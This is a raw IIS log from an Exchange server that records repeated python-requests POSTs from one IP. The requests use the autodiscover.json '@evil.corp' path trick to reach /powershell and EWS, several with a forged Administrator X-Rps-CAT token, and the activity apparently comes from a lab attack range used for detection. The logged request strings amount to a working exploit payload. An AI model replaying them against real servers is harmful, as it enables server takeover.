application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:11 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=7d27c7a2-ef14-4c0b-828a-84e0fe44e5e9; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1374 3451 229 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:08 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=e9fc4a53-2ab9-4dd2-9bb0-b700b00f55f9; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 995 1788 268 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:08 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=1d04d758-0531-4756-bd72-e43bb320df25; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 3034 2125 256 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:08 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=a6196bec-1ad1-46a9-9545-d6a9a81eaa78; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1068 5232 306 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:07 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=dfd2a865-e69d-4159-9c63-d59a464e14dc; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1192 2076 258 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:07 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=8b889ce7-746c-4bf7-b1ac-32e264429dcb; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 2000 2076 227 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:07 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=ce751579-45d4-4404-a14f-ca3081b4c981; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1220 2076 724 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:06 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTB9BZG1pbmlzdHJhdG9yQGF0dGFja3JhbmdlLmxvY2FsVS1TLTEtNS0yMS0yMjUxNTE4MTc3LTE2OTY3OTA1MTUtMzAxNDQ1MzMzNi01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=e24350ed-2564-467f-8417-3be179f32be1; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1372 3451 231 - application/soap+xml;charset=UTF-8 on 2022-10-03 17:45:06 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=b876cfcc-5e31-44fa-8848-3c5b8ad366bb; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 1520 2324 3262 - text/xml on 2022-10-03 17:44:59 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/autodiscover/autodiscover.xml?&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=d0cf792c-bc2a-49a5-be0e-2c5aa1bbd66e; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 exchangecookie=286b15f3df6c4e9f91497960d9c59849 - 100.21.120.14 200 0 0 2013 797 244 - text/xml on 2022-10-03 17:44:59 W3SVC1 exchange01 10.0.1.15 POST /autodiscover/autodiscover.json @evil.corp/EWS/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp&CorrelationID=;&cafeReqId=5d046776-6f74-4577-89fa-b4db1c0539c4; 443 - 89.23.145.158 HTTP/1.1 python-requests/2.25.0 - - 100.21.120.14 200 0 0 1681 823 290 - text/xml on